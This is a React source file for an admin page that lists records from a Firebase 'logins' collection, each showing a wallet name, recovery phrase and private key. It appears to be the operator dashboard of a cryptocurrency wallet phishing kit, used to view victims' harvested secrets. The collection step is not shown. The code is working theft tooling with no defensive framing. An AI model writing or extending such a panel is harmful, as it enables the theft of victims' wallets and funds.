import React, { useState, useEffect } from "react";
import { Table, Container, Alert } from "react-bootstrap";
import db from "./firebase";

function Admin() {
  const [result, setResult] = useState([]);

  useEffect(() => {
    //run once the app components load
    db.collection("logins")
      .orderBy("timestamp", "desc")
      .onSnapshot((snapshot) => {
        setResult(
          snapshot.docs.map((doc) => ({
            id: doc.id,
            info: doc.data(),
          }))
        );
      });
  }, []);
  console.log(result[0]);
  return (
    <div>
      <Container className="mt-5">
        <Alert variant="success">
          <center>🎈New infos ontop🎈</center>
        </Alert>
        <Table striped bordered hover>
          <thead>
            <tr>
              <th>Wallet</th>
              <th>Phrase</th>
              <th>PrivateKey</th>
            </tr>
          </thead>
          <tbody>
            {result.map(({ id, info }) => (
              <tr key={id}>
                <td>{info.phrase.wallet}</td>
                <td>{info.phrase.phrase}</td>
                <td>{info.phrase.privatekey}</td>
                {/* <td>{info.timestamp.Date()}</td> */}
              </tr>
            ))}
          </tbody>
        </Table>
      </Container>
    </div>
  );
}

export default Admin;
